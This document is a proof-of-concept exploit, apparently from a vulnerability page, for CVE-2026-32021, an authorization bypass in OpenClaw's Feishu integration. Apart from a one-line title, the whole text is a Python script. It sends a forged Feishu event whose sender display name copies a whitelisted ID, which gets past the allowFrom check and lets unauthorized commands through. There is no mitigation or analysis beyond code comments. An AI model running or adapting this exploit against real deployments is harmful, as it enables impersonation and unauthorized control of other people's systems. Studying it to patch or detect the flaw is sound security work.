CVE-2026-32021 OpenClaw授权绕过漏洞

#!/usr/bin/env python3 """ PoC for CVE-2026-32021 Demonstrates authorization bypass by spoofing the sender display name. """ import requests import json def exploit_poc(target_url, trusted_whitelist_id): """ Simulates a request to OpenClaw with a forged display name. :param target_url: The URL of the OpenClaw endpoint. :param trusted_whitelist_id: The ID string present in the allowFrom configuration. """ headers = {'Content-Type': 'application/json'} # Construct a malicious payload mimicking a Feishu event # The key vulnerability is that the system checks 'name' instead of 'user_id' payload = { "token": "dummy_token", "challenge": "challenge_code", "event": { "sender": { "sender_id": { "open_id": "ou_attacker_real_id", "user_id": "attacker_real_id" }, # VULNERABILITY: Setting the mutable display name to the trusted ID "sender_name": trusted_whitelist_id, "type": "user" }, "message": { "content": "Unauthorized command execution attempt" } } } print(f"[*] Sending payload to {target_url}...") print(f"[*] Forged sender_name to: {trusted_whitelist_id}") try: response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=10) if response.status_code == 200: print("[+] Potential exploit successful! Request accepted.") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": # Example usage target = "http://localhost:8080/api/feishu/callback" # Assume 'ou_admin123' is the ID in the allowFrom whitelist trusted_id = "ou_admin123" exploit_poc(target, trusted_id)